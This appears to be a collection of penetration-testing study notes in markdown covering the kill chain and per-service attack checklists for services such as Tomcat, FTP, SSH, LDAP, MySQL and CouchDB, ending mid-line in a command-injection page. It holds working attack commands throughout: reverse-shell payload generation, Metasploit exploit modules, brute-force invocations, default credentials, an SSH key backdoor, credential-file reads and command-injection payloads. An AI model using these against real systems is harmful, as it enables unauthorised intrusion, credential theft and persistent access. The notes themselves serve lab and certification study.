Chain 2 | 3 | ## 7 Stages 4 | 5 | 1. Reconnaissance 6 | 2. Weaponization 7 | 3. Delivery 8 | 4. Exploitation 9 | 5. Installation 10 | 6. Command and control 11 | 7. Actions 12 | 13 | ### Reconnaissance 14 | 15 | * Cyber equivalent of "casing the joint" 16 | * IP address scan of the business domain 17 | * Port scan of active hosts 18 | * Identify vectors for attack 19 | * Checking software versions 20 | * Automated scanning to scale the attack -- botnets 21 | 22 | ### Weaponization 23 | 24 | * Customize a vulnerability to a target 25 | * Integrate into a cyberattack platform 26 | * Purchased ready to run 27 | 28 | ### Delivery 29 | 30 | * Email attachment 31 | * Compromised website 32 | * Log into the target 33 | * Default credentials 34 | * Stolen credentials 35 | * Internet-exposed vulnerability 36 | * Flash drive 37 | 38 | ### Exploitation 39 | 40 | * Exploit a vulnerability 41 | * Unauthorized use of credentials 42 | * Unaware execution of malware 43 | 44 | ### Installation 45 | 46 | * Install payload into memory or disk 47 | * Execute payload after system restart 48 | * Provides ongoing access 49 | 50 | ### Command and Control 51 | 52 | * Connect to the command and control server 53 | * Receive commands 54 | * List subdirectories and files 55 | * Extract a named file 56 | * Modify or replace software 57 | * Determine the command and control server address 58 | 59 | ### Actions 60 | 61 | * Action 62 | * Deface website 63 | * Steal sensitive information 64 | * Access a bank account 65 | -------------------------------------------------------------------------------- /pentesting-network/80-443-http-s/tomcat.md: -------------------------------------------------------------------------------- 1 | # Tomcat 2 | 3 | 4 | 5 | ## Exploitation Checks 6 | 7 | * Open Tomcat Manager 8 | * Check to see if any of the default credentials will work to log in. Common ones: 9 | * `admin:admin` 10 | * `tomcat:tomcat` 11 | * `admin:` 12 | * `admin:s3cr3t` 13 | * `tomcat:s3cr3t` 14 | * `admin:tomcat` 15 | * If so, we may be able to upload a war file to get a reverse shell. 16 | * After upload and deploying the war file, we can start a `netcat` listener, then select the war file from the Application Path column in Tomcat. 17 | * Open Tomcat Administration 18 | * Check to see if any of the default credentials will work to log in. 19 | * Check **/manager/status** path to look for version details and then known exploits especially if you cannot access **/manager/html**. 20 | 21 | ### MSFvenom Reverse Shell 22 | 23 | ```bash 24 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shellw.war 25 | ``` 26 | 27 | ### Metasploit 28 | 29 | ```bash 30 | use exploit/multi/http/tomcat_mgr_upload 31 | msf exploit(multi/http/tomcat_mgr_upload) > set rhost 32 | msf exploit(multi/http/tomcat_mgr_upload) > set rport 33 | msf exploit(multi/http/tomcat_mgr_upload) > set httpusername 34 | msf exploit(multi/http/tomcat_mgr_upload) > set httppassword 35 | msf exploit(multi/http/tomcat_mgr_upload) > exploit 36 | ``` 37 | 38 | ## Brute Force 39 | 40 | ### Hydra 41 | 42 | ```bash 43 | hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html 44 | ``` 45 | 46 | ### Metasploit 47 | 48 | ```bash 49 | msf> use auxiliary/scanner/http/tomcat_mgr_login 50 | ``` 51 | -------------------------------------------------------------------------------- /pentesting-network/21-ftp.md: -------------------------------------------------------------------------------- 1 | # 21 (FTP) 2 | 3 | ## Enumeration 4 | 5 | ### Banner Grabbing 6 | 7 | ```bash 8 | nc 21 # Grab headers 9 | telnet -vn 21 10 | openssl s_client -connect crossfit.htb:21 -starttls ftp #Get certificate if any 11 | ``` 12 | 13 | ### Connections 14 | 15 | #### Anonymous Login 16 | 17 | * `anonymous:anonymous` 18 | * `anonymous:` 19 | * `guest:` 20 | * `ftp:ftp` 21 | * `admin:admin` 22 | 23 | ```bash 24 | ftp 25 | ftp -p # Passive mode login 26 | >ls -a # List all files (even hidden) (yes, they could be hidden) 27 | >dir /a 28 | >passive # Set the mode to passive 29 | >binary # Set transmission to binary instead of ascii 30 | >ascii # Set transmission to ascii instead of binary 31 | >bye # exit 32 | ``` 33 | 34 | #### Downloading 35 | 36 | ```bash 37 | PASSIVE 38 | BINARY 39 | get 40 | mget * # Download all files 41 | wget -m ftp://anonymous:anonymous@10.10.10.98 # Donwload all files 42 | wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 # Download all files 43 | ``` 44 | 45 | #### Uploading 46 | 47 | ```bash 48 | PASSIVE 49 | BINARY 50 | put 51 | ``` 52 | 53 | ### nmap Scripts 54 | 55 | ```bash 56 | nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 57 | nmap --script ftp-* -p 21 58 | ``` 59 | 60 | ### Checks 61 | 62 | * [ ] Check for anonymous access 63 | * [ ] Check if you can upload a file to trigger a webshell through webapp 64 | * [ ] Check if you can download backup files to extract included passwords 65 | * [ ] Check the version of FTP for exploits 66 | 67 | ## Brute Forcing 68 | 69 | ```bash 70 | hydra -V -f -L -P ftp:// -u -vV 71 | hydra -l root -P passwords.txt [-t 32] ftp 72 | ``` 73 | -------------------------------------------------------------------------------- /pentesting-network/110-pop3.md: -------------------------------------------------------------------------------- 1 | # 110 (POP3) 2 | 3 | ## Enumeration 4 | 5 | ### Checks 6 | 7 | * [ ] Check version for exploits 8 | * [ ] Check mails for the presence of credentials 9 | 10 | ### Banner Grabbing 11 | 12 | ```bash 13 | nc -nv 110 14 | telnet 110 15 | openssl s_client -connect :995 -crlf -quiet 16 | ``` 17 | 18 | ### nmap 19 | 20 | ```bash 21 | nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -port # All are default scripts 22 | ``` 23 | 24 | ## Commands 25 | 26 | ``` 27 | USER uid Log in as "uid" 28 | PASS password Substitue "password" for your actual password 29 | STAT List number of messages, total mailbox size 30 | LIST List messages and sizes 31 | RETR n Show message n 32 | DELE n Mark message n for deletion 33 | RSET Undo any changes 34 | QUIT Logout (expunges messages if no RSET) 35 | TOP msg n Show first n lines of message number msg 36 | CAPA Get capabilities 37 | ``` 38 | 39 | ## Brute Force 40 | 41 | ### Hydra 42 | 43 | ```bash 44 | hydra -l -P /path/to/passwords.txt -f pop3 -V 45 | hydra -S -v -l -P /path/to/passwords.txt -s 995 -f pop3 -V 46 | ``` 47 | 48 | ### Metasploit 49 | 50 | ```bash 51 | use auxiliary/scanner/pop3/pop3_login 52 | ``` 53 | 54 | ## Example 55 | 56 | ```bash 57 | root@kali:~# telnet $ip 110 58 | +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready 59 | USER billydean 60 | +OK 61 | PASS password 62 | +OK Welcome billydean 63 | 64 | list 65 | 66 | +OK 2 1807 67 | 1 786 68 | 2 1021 69 | 70 | retr 1 71 | 72 | +OK Message follows 73 | From: jamesbrown@motown.com 74 | Dear Billy Dean, 75 | 76 | Here is your login for remote desktop ... try not to forget it this time! 77 | username: billydean 78 | password: PA$$W0RD!Z 79 | ``` 80 | -------------------------------------------------------------------------------- /misc/powershell.md: -------------------------------------------------------------------------------- 1 | # PowerShell 2 | 3 | ## Examples 4 | 5 | ### Commands 6 | 7 | ```powershell 8 | Get-Verb # List available verbs 9 | (Get-Verb).count # Get the count of command output 10 | help push # Get help on a specific verb 11 | help pushd # Get additional help from previous command output 12 | hostname > direct.txt # Redirect output to a file 13 | dir >> direct.txt # Append output to a file 14 | type direct.txt # Read out file to the console 15 | cat direct.txt # Another way to read out file to the console 16 | Get-Process # Get running processes 17 | echo "Hello World" # Send Hello World to the console 18 | Write-Host "Hello World" # Send Hello World to the console 19 | ``` 20 | 21 | ### Variables 22 | 23 | ```powershell 24 | $name = 'Erich' 25 | $number = 42 26 | $nlist = 1,3,5,7,11,13 27 | ($nlist).count 28 | echo "The list is $nlist" 29 | ``` 30 | 31 | ### If Statements 32 | 33 | ```powershell 34 | if ($nlist[1] -gt 0) 35 | { 36 | echo "Positive" 37 | } 38 | ``` 39 | 40 | ### Loops 41 | 42 | ```powershell 43 | $i = 1 44 | do { 45 | $val = $nlist | Select-Object -Index $i 46 | echo "Value is $val" 47 | $i = $i + 1 48 | } while ($i -le ($nlist).count) 49 | ``` 50 | 51 | ```powershell 52 | ForEach ($val in $nlists) 53 | { echo "Value is $val" 54 | } 55 | ``` 56 | 57 | ## Nishang 58 | 59 | ```powershell 60 | # Pre-req 61 | Set-ExecutionPolicy Unrestricted 62 | gci c:\nishang\ -recurse | Unblock-File 63 | Import-Module .\nishang.psm1 64 | # Example commands 65 | Get-Command -Module nishang 66 | Get-Information > info.txt 67 | Get-Help Invoke-Mimikatz -full 68 | Get-Passhashes 69 | Invoke-PortScan -startaddress 10.0.2.1 -endaddress 10.0.2.8 -ScanPort 70 | Out-Word -Paload "powershell.exe -ExecutionPolicy Bypass -noprofile" 71 | Invoke-BruteForce 10.0.2.8 -service FTP -userlist users.txt -passwordlist passes.txt -verbose -StopOnSuccess 72 | Invoke-Prasadhak # Requries API key from Virus Total 73 | ``` 74 | -------------------------------------------------------------------------------- /pentesting-web/burp-suite.md: -------------------------------------------------------------------------------- 1 | # Burp Suite 2 | 3 | ## Burp Suite Certified Practitioner 4 | 5 | How to Prepare 6 | 7 | [https://portswigger.net/web-security/certification/how-to-prepare](https://portswigger.net/web-security/certification/how-to-prepare) 8 | 9 | Hints and Guidance 10 | 11 | [https://portswigger.net/web-security/certification/exam-hints-and-guidance](https://portswigger.net/web-security/certification/exam-hints-and-guidance) 12 | 13 | 14 | 15 | ## Server-side topics 16 | 17 | ### SQL Injection 18 | 19 | ### Authentication 20 | 21 | ### Path traversal 22 | 23 | ### Command injection 24 | 25 | ### Business logic vulnerabilities 26 | 27 | ### Information Disclosure 28 | 29 | ### Access control 30 | 31 | ### File upload vulnerabilities 32 | 33 | ### Race conditions 34 | 35 | ### Server-side request forgery (SSRF) 36 | 37 | ### XXE injection 38 | 39 | ### No SQL injection 40 | 41 | ### API Testing 42 | 43 | ### Web cache deception 44 | 45 | 46 | 47 | ## Client-side topics 48 | 49 | ### Cross-site scripting (XSS) 50 | 51 | ### Cross-site request forgery (CSRF) 52 | 53 | ### Cross-origin resource sharing (CORS) 54 | 55 | ### Clickjacking 56 | 57 | ### DOM-base vulnerabilities 58 | 59 | ### WebSockets 60 | 61 | ## Advanced topics 62 | 63 | ### Insecure deserialization 64 | 65 | ### Web LLM attacks 66 | 67 | ### GraphQL API vulnerabilities 68 | 69 | ### Server-side template injection 70 | 71 | ### Web cache poisoning 72 | 73 | ### HTTP Host header attacks 74 | 75 | ### HTTP request smuggling 76 | 77 | ### OAuth authentication 78 | 79 | ### JWT attacks 80 | 81 | ### Prototype pollution 82 | 83 | ### Essential skills 84 | 85 | 86 | 87 | -------------------------------------------------------------------------------- /pentesting-network/389-ldap.md: -------------------------------------------------------------------------------- 1 | # 389 (LDAP) 2 | 3 | ## Enumeration 4 | 5 | ### Anonymous 6 | 7 | #### ldapsearch 8 | 9 | New Syntax 10 | 11 | ```bash 12 | ldapsearch -H ldap:// -x -b "DC=hutch,DC=offsec" 13 | ldapsearch -H ldap://192.168.71.122 -x -b "CN=Users,DC=hutch,DC=offsec" # Get User info 14 | # Look for any plaintext passwords in the description field 15 | ldapsearch -H "ldap://" -v -x -b "DC=hutch,DC=offsec" "(objectclass=*)" 16 | 17 | # If LAPS is found on the server, can look for admin password 18 | ldapsearch -H ldap:// -v -x -D @HUTCH.OFFSEC -w -b "DC=hutch,DC=offsec" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd 19 | ``` 20 | 21 | Old Syntax 22 | 23 | ```bash 24 | ldapsearch -h -x -s base namingcontexts # Look for the dn: i.e. DC=htb,DC=local 25 | ldapsearch -h -x -b "DC=htb,DC=local" > ldap-anonymmous.out # All ldap info we can query as anonymous 26 | ldapsearch -h -x -s sub -b "DC=htb,DC=local" 27 | ldapsearch -h -x -b "DC=htb,DC=local" '(objectClass=Person)' # Look at user info 28 | ldapsearch -h -x -b "DC=htb,DC=local" '(objectClass=Person)' sAMAccountName 29 | # Grab just the usernames to try and brute force/password spray 30 | ldapsearch -h -x -b "DC=htb,DC=local" '(objectClass=Person)' sAMAccountName | grep sAMAccountName | awk '{print $2}' > userlist.ldap # Make it easier to do a password spray 31 | # Can try to check password policy with crackmapexec 32 | crackmapexec smb --pass-pol -u '' -p '' # Using null user & passowrd 33 | # Look for 'Account lockout threshold: 0' # Ideal for brute force 34 | # Brute Force 35 | crackmapexec smb -u userlist.txt -p pwlist.txt 36 | ``` 37 | 38 | #### nmap 39 | 40 | ```bash 41 | nmap -n -sV --script "ldap* and not brute" # Using anonymous credentials 42 | ``` 43 | 44 | ### Authenticated 45 | 46 | #### ldapdomaindump 47 | 48 | ```bash 49 | kali@kali:~/ctf/tryhackme/enterprise$ ldapdomaindump 10.10.55.72 -u 'LAB-ENTERPRISE\nik' -p ToastyBoi! -o ldapdomaindumpdir 50 | ``` 51 | -------------------------------------------------------------------------------- /pentesting-network/3389-rdp.md: -------------------------------------------------------------------------------- 1 | # 3389 (RDP) 2 | 3 | ## Enumeration 4 | 5 | ### Checks 6 | 7 | * [ ] Check if you can login with default guest account and blank password 8 | * [ ] Check if you can brute force users 9 | * [ ] Check for BlueKeep 10 | 11 | ### nmap 12 | 13 | ```bash 14 | nmap -p 3389 --script=rdp-enum-encryption,rdp-vuln-ms12-020 -o 3389_nmap_rdp 15 | nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 16 | ``` 17 | 18 | ### Check known credentials 19 | 20 | ```bash 21 | rdp_check /:@ # rdp_check.py from impacket 22 | ``` 23 | 24 | ### Manual Login 25 | 26 | #### rdesktop 27 | 28 | ```bash 29 | rdesktop 30 | # Try default guest account "guest":"" 31 | rdesktop -u guest -g 94% 32 | rdesktop -u guest -p guest -g 94% 33 | # Use known credentials 34 | rdesktop -u 35 | rdesktop -d -u -p 36 | ``` 37 | 38 | #### xfreerdp 39 | 40 | ```bash 41 | xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:[IP] /u:bitbucket /p:[PW] 42 | 43 | xfreerdp /u:username /p:password /cert:ignore /v:MACHINE_IP 44 | xfreerdp /u:[DOMAIN\] /p: /v: 45 | 46 | xfreerdp /u:[DOMAIN\] /pth: /v: 47 | 48 | xfreerdp /u:[domain\] /p: /v: 49 | xfreerdp /u:[domain\] /pth: /v: 50 | ``` 51 | 52 | ## Brute Force 53 | 54 | #### ncrack 55 | 56 | ```bash 57 | ncrack -vv --user Administrator -P /usr/share/wordlists/rockyou.txt rdp:// 58 | ncrack -vv --user Administrator -P /usr/share/seclists/Passwords/darkweb2017-top100.txt rdp:// 59 | 60 | ``` 61 | 62 | #### Hydra 63 | 64 | ```bash 65 | hydra -l username -P /usr/share/wordlists/rockyou.txt -t 5 -V ip_address rdp 66 | hydra -f -L -P rdp:// -u -vV 67 | ``` 68 | 69 | #### crowbar 70 | 71 | ```bash 72 | crowbar -b rdp -s /CIDR -u -C 73 | crowbar -b rdp -s /CIDR -U -C 74 | ``` 75 | -------------------------------------------------------------------------------- /pentesting-network/3306-mysql.md: -------------------------------------------------------------------------------- 1 | # 3306 (MySQL) 2 | 3 | ## Enumeration 4 | 5 | ### Checks 6 | 7 | * [ ] Try default credentials "root":"" 8 | * [ ] Brute force credentials 9 | * [ ] Check database content for new passwords 10 | * [ ] Check version for exploits 11 | 12 | ### Connection 13 | 14 | #### Local 15 | 16 | ```bash 17 | 18 | mysql -u root # Connect to root without password 19 | mysql -u root -p # A password will be asked (check someone) 20 | ``` 21 | 22 | #### Remote 23 | 24 | ```bash 25 | mysql --host= -u root -p 26 | mysql -h -u root 27 | mysql -h -u root@localhost 28 | ``` 29 | 30 | ### nmap 31 | 32 | ```bash 33 | kali@kali:~/oscp/labs/10.11.1.8$ nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 34 | nmap -sV -Pn --script=mysql-audit.nse,mysql-brute.nse,mysql-databases.nse,mysql-dump-hashes.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-query.nse,mysql-users.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse -p 3306 -o 3306_nmap_mysql 35 | nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 36 | ``` 37 | 38 | ### Metasploit 39 | 40 | ```bash 41 | msf> use auxiliary/scanner/mysql/mysql_version 42 | msf> use uxiliary/scanner/mysql/mysql_authbypass_hashdump 43 | msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds 44 | msf> use auxiliary/admin/mysql/mysql_enum #Creds 45 | msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds 46 | msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds 47 | ``` 48 | 49 | ### Extract Credentials 50 | 51 | ```bash 52 | cat /etc/mysql/debian.cnf 53 | grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password" 54 | ``` 55 | 56 | ## Brute Force 57 | 58 | ### Hydra 59 | 60 | ```bash 61 | hydra -L -P mysql -vV -I -u 62 | ``` 63 | -------------------------------------------------------------------------------- /pentesting-web/web-testing.md: -------------------------------------------------------------------------------- 1 | # Web Testing 2 | 3 | ## OWASP 4 | 5 | ### OWASP Top 10 6 | 7 | {% embed url="https://owasp.org/www-pdf-archive/OWASP_Top_10-2017_(en).pdf.pdf" %} 8 | 9 | ### OWASP Testing Guide 10 | 11 | {% embed url="https://owasp.org/www-project-web-security-testing-guide/assets/archive/OWASP_Testing_Guide_v4.pdf" %} 12 | 13 | ### OWASP Testing Checklist 14 | 15 | {% embed url="https://github.com/tanprathan/OWASP-Testing-Checklist" %} 16 | 17 | ### OWASP Juice Shop 18 | 19 | ## Approach Web Testing 20 | 21 | 1. 2 Main Approaches 22 | 1. Web crawling 23 | 2. Proxy Interception 24 | 2. Manual checks 25 | 1. Checking source for comments 26 | 1. Credentials 27 | 2. Bugs commented out 28 | 3. Client-side code 29 | 3. Webserver 30 | 1. Technologies 31 | 1. Known vulnerabilities 32 | 2. Cryptographic weaknesses 33 | 2. Transport services 34 | 1. Secure Transport Server (STS) 35 | 2. HTTP and HTTPS 36 | 3. WebSockets 37 | 4. Authentication 38 | 1. Ecommerce 39 | 1. Payment gateways interface 40 | 2. Credentials 41 | 1. Query strings 42 | 2. Password reset pages 43 | 3. Default and hard-coded credentials 44 | 5. Session Management 45 | 1. Hijacking a session 46 | 2. Intercepting session cookies 47 | 3. Predicting session tokens 48 | 49 | ## Test Websites with Burp Suite 50 | 51 | * Utilize the Target tab 52 | * Add target to the Scope 53 | * View found information under Site Map 54 | * 55 | 56 | ## Check Web Servers with Nikto 57 | 58 | ```bash 59 | nikto -h 60 | ``` 61 | 62 | Enumerate the output. 63 | 64 | ## Fingerprinting Web Servers 65 | 66 | ### HTTPRecon 67 | 68 | {% embed url="https://www.computec.ch/projekte/httprecon?s=download" %} 69 | 70 | ### NetSquare 71 | 72 | {% embed url="https://www.net-square.com/httprint.html" %} 73 | 74 | ### Uniscan 75 | 76 | ```bash 77 | uniscan -u 78 | ``` 79 | 80 | ## Web Server Penetration using SQLmap 81 | 82 | ```bash 83 | sqlmap -u https://admin-portal.europacorp.htb/ --forms --crawl=2 --dump 84 | ``` 85 | -------------------------------------------------------------------------------- /pentesting-web/authentication.md: -------------------------------------------------------------------------------- 1 | # Authentication 2 | 3 | ## PortSwigger 4 | 5 | [https://portswigger.net/web-security/authentication](https://portswigger.net/web-security/authentication) 6 | 7 | 8 | 9 | ## PortSwigger Labs 10 | 11 | ### Password-based login 12 | 13 | [https://portswigger.net/web-security/authentication/password-based](https://portswigger.net/web-security/authentication/password-based) 14 | 15 | #### Username enumeration via different responses (Apprentice) 16 | 17 | > This lab is vulnerable to username enumeration and password brute-force attacks. It has an account with a predictable username and password. To solve the lab, enumerate a valid username, brute-force this user's password, then access their account page. 18 | 19 | * Navigated to Login page 20 | * Entered in generic credentials (test:test) 21 | * Error return "Invalid username" 22 | * We can determine a valid username by brute-forcing using a wordlist in Burp 23 | * Opened Burp 24 | 25 | #### Username enumeration via subtly different responses (Practitioner) 26 | 27 | #### Username enumeration via response timing (Practitioner) 28 | 29 | #### Broken brute-force protection, IP block (Practitioner) 30 | 31 | #### Username enumeration via account lock (Practitioner) 32 | 33 | #### Broken brute-force protection, multiple credentials per request (Expert) 34 | 35 | ### Multi-factor authentication 36 | 37 | [https://portswigger.net/web-security/authentication/multi-factor](https://portswigger.net/web-security/authentication/multi-factor) 38 | 39 | #### 2FA simple bypass (Apprentice) 40 | 41 | #### 2FA broken logic (Practitioner) 42 | 43 | #### 2FA bypass using a brute-force attack (Expert) 44 | 45 | ### Other Authentication Mechanisms 46 | 47 | [https://portswigger.net/web-security/authentication/other-mechanisms](https://portswigger.net/web-security/authentication/other-mechanisms) 48 | 49 | #### Password reset broken logic (Apprentice) 50 | 51 | #### Password reset poisoning via middleware (Practitioner) 52 | 53 | #### Password brute-force via password change (Practitioner) 54 | 55 | #### Brute-forcing a stay-logged-in cookie (Practitioner) 56 | 57 | #### Offline password cracking (Practitioner) 58 | 59 | -------------------------------------------------------------------------------- /pentesting-network/5984-6984-couchdb.md: -------------------------------------------------------------------------------- 1 | # 5984, 6984 (CouchDB) 2 | 3 | ## Enumeration 4 | 5 | ### Automatic 6 | 7 | ```bash 8 | nmap -sV --script couchdb-databases,couchdb-stats -p 9 | msf> use auxiliary/scanner/couchdb/couchdb_enum 10 | ``` 11 | 12 | ### Manual 13 | 14 | ```bash 15 | curl http://:5984 16 | # Banner grab (Can also open in a browser) 17 | curl http://:5984/_all_dbs 18 | # List of all the databases 19 | curl http://user:password@:5984/_all_dbs 20 | # List of all the databases with authentication 21 | curl http://:5984/ 22 | # List database information 23 | curl http://:5984//_all_docs 24 | # List each entry inside of a database 25 | curl http://:5984// 26 | # Read content of a document in a database 27 | curl http://10.10.202.192:5984/_utils/ 28 | # Path for the web administration tool 29 | ``` 30 | 31 | ## Exploitation 32 | 33 | ### Unprotected 34 | 35 | #### CVE-2017-12636 36 | 37 | Since we should have administrative access here we should be able to find an exploit to execute. 38 | 39 | * Found: [https://github.com/moayadalmalat/CVE-2017-12636](https://github.com/moayadalmalat/CVE-2017-12636) 40 | * Download code and update the **target** and **command** variables in the script 41 | * Start a netcat listener: `nc -lvnp 4444` 42 | * Run the exploit: `python3 exploit.py` 43 | 44 | ### Protected 45 | 46 | Since we do NOT have access we will need to get access. 47 | 48 | #### Brute Force 49 | 50 | Hydra 51 | 52 | ```bash 53 | hydra -l admin -P /opt/100-common-passwords.txt -s 5984 -f http-get /_utils 54 | # And we get the password 55 | ``` 56 | 57 | Metasploit 58 | 59 | ```bash 60 | use auxiliary/scanner/couchdb/couchdb_login 61 | set RHOSTS demo2.ine.local 62 | set USERNAME admin 63 | set PASS_FILE /root/Desktop/wordlists/100-common-passwords.txt 64 | set STOP_ON_SUCCESS True 65 | set VERBOSE true 66 | exploit 67 | ``` 68 | 69 | #### RCE 70 | 71 | Metasploit 72 | 73 | ```bash 74 | search couchdb 75 | use exploit/linux/http/apache_couchdb_cmd_exec 76 | set PAYLOAD linux/x64/meterpreter/bind_tcp 77 | set RHOSTS 78 | set LHOST 79 | set httpusername admin 80 | set httppassword madalina 81 | exploit 82 | ``` 83 | -------------------------------------------------------------------------------- /pentesting-network/22-ssh.md: -------------------------------------------------------------------------------- 1 | # 22 (SSH) 2 | 3 | ## Enumeration 4 | 5 | ### Checks 6 | 7 | * [ ] Try easy username-password combinations 8 | * [ ] Check for username enumeration vulnerabilities 9 | * [ ] Check version for vulnerabilities 10 | * [ ] Attempt brute forcing 11 | * [ ] Check for Port Knocking 12 | 13 | ### Banner Grabbing 14 | 15 | ```bash 16 | nc 22 17 | nc -vn 22 18 | ``` 19 | 20 | ### Connections 21 | 22 | #### SSH 23 | 24 | ```bash 25 | ssh @ 26 | ssh @ -i id_rsa # Login via private key. chmod 600 27 | ``` 28 | 29 | #### SCP 30 | 31 | ```bash 32 | scp @:/path/to/copy 33 | ``` 34 | 35 | #### SFTP 36 | 37 | ```bash 38 | sftp 39 | ``` 40 | 41 | ### nmap Scripts 42 | 43 | ```bash 44 | nmap -p 22000 -sV -Pn -T4 --script=ssh* 45 | ``` 46 | 47 | ### Restricted Shell Breakout 48 | 49 | ```bash 50 | ssh joe@funbox -i joe_id_rsa -t "bash --noprofile" 51 | ssh seppuku@192.168.53.90 -t "bash --noprofile" 52 | ``` 53 | 54 | ### Account Login Error 55 | 56 | ```bash 57 | # When getting a specific error where only SFTP works, try... 58 | ssh -v @ id 59 | ssh -v @ /bin/bash 60 | ``` 61 | 62 | ### Port knocking 63 | 64 | ```bash 65 | # If nmap comes back showing port 22 as filtered... 66 | # We need to find the /etc/knockd.conf (thorough LFI or FTP or something else) 67 | # Inside there is a sequence 68 | knock IP SEQUENCE1 SEQUENCE2 SEQUENCE3 69 | # Check nmap again 70 | ``` 71 | 72 | ### Key Generation 73 | 74 | ```bash 75 | # Attack machine 76 | ssh-keygen 77 | chmod 600 78 | cat .pub 79 | # Target 80 | echp .pub >> /.ssh/authorized_keys 81 | ``` 82 | 83 | ## Backdoor 84 | 85 | ```bash 86 | # Attacker 87 | ssh-keygen -f 88 | chmod 600 89 | cat .pub -> copy 90 | 91 | # Victim 92 | echo .pub >> /.ssh/authorized_keys 93 | 94 | # Connect 95 | ssh -i @ 96 | ``` 97 | 98 | ## Brute Force 99 | 100 | ```bash 101 | hydra -v -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 ssh 102 | hydra -l -P passwords.txt -T 20 ssh 103 | hydra -V -f -L -P ssh:// -u -vV 104 | ``` 105 | -------------------------------------------------------------------------------- /pentesting-network/161-snmp.md: -------------------------------------------------------------------------------- 1 | # 161 (SNMP) 2 | 3 | ## Enumeration 4 | 5 | ### Checks 6 | 7 | * [ ] Try the default community strings 'public' and 'private' 8 | * [ ] Enumerate version of OS, users, and processes 9 | 10 | ### Community Strings 11 | 12 | | | | 13 | | ---------------------- | ---------------- | 14 | | 1.3.6.1.2.1.25.1.6.0 | System Processes | 15 | | 1.3.6.1.2.1.25.4.2.1.2 | Running Programs | 16 | | 1.3.6.1.2.1.25.4.2.1.4 | Process Path | 17 | | 1.3.6.1.2.1.25.2.3.1.4 | Storage Units | 18 | | 1.3.6.1.2.1.25.6.3.1.2 | Software Name | 19 | | 1.3.6.1.4.1.77.1.2.25 | User Accounts | 20 | | 1.3.6.1.2.1.6.13.1.3 | TCP Local Ports | 21 | 22 | ### Commands 23 | 24 | #### nmap 25 | 26 | ```bash 27 | nmap -sU -p161 --script "snmp-*" 28 | ``` 29 | 30 | ### Brute Force Community Strings 31 | 32 | ```bash 33 | # try 100+ community strings 34 | onesixtyone -c /home/liodeus/wordlist/SecLists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt 35 | onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 36 | # only try "public" and "private" 37 | onesixtyone -i targets.list 38 | ``` 39 | 40 | #### snmpwalk 41 | 42 | ```bash 43 | snmpwalk -c public -v1 192.168.1.101 #community string and which version 44 | # enumerate windows users 45 | snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25 46 | # enumerates running processes 47 | snmpwalk -c public -v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2 48 | ``` 49 | 50 | ```bash 51 | snmpwalk -v 2c -c public 52 | snmpwalk -v 2c -c public hrSWInstalledName 53 | snmpwalk -v 2c -c public hrMemorySize 54 | snmpwalk -v 2c -c public sysContact # Get the sysContatact variable i.e. nikos 55 | snmpset -v 2c -c public sysContact.0 s els # Change sysContact variable to els 56 | 57 | ``` 58 | 59 | #### snmpbulkwalk 60 | 61 | ```bash 62 | snmpbulkwalk -c -v 63 | ``` 64 | 65 | #### snmp-check 66 | 67 | ```bash 68 | snmp-check 69 | snmp-check -t -c public 70 | ``` 71 | 72 | ### Enumerate Info with Known Community String 73 | 74 | ```bash 75 | snmpwalk -c public -v1 192.168.1.101 #community string and which version 76 | # enumerate windows users 77 | snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25 78 | # enumerates running processes 79 | snmpwalk -c public -v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2 80 | ``` 81 | 82 | ### Modifying SNMP Values 83 | 84 | ```bash 85 | http://net-snmp.sourceforge.net/tutorial/tutorial-5/commands/snmpset.html 86 | ``` 87 | -------------------------------------------------------------------------------- /pentesting-web/command-injection/README.md: -------------------------------------------------------------------------------- 1 | # Command Injection 2 | 3 | ### How to Find 4 | 5 | #### Black-Box Testing 6 | 7 | * Map the application (Using Burp) 8 | * Identify all instances where the web application appears to be interacting with the underlying operating system 9 | * Fuzz the application 10 | * Shell metacharacters: `&`, `&&`, `|`, `||`, `;`, `\n`, `` ` ``, `$()`. 11 | * For in-band command injection, analyze the response of the application to determine if it's vulnerable. 12 | * For blind command injection, you need to get creative. 13 | * Trigger a time delay using the ping or sleep command. 14 | * Output the response of the command in the web root and retrieve the file directly using a browser. 15 | * Open an out-of-band channel back to a server you control. 16 | 17 | #### White-Box Testing 18 | 19 | * Perform a combination of black box and white-box testing 20 | * Map all input vectors in the application. 21 | * Review source code to determine if any of the input vectors are added as parameters to functions that execute system commands. 22 | 23 | ### How to Exploit 24 | 25 | #### In-band 26 | 27 | * Shell metacharacters: `&`, `&&`, `|`, `||`, `;`, `\n`, `` ` ``, `$()`. 28 | * Concatenate another commands 29 | * `127.0.0.1 && cat /etc/passwd &` 30 | * `127.0.0.1 & cat /etc/passwd &` 31 | * `127.0.0.1 || cat /etc/passwd &` 32 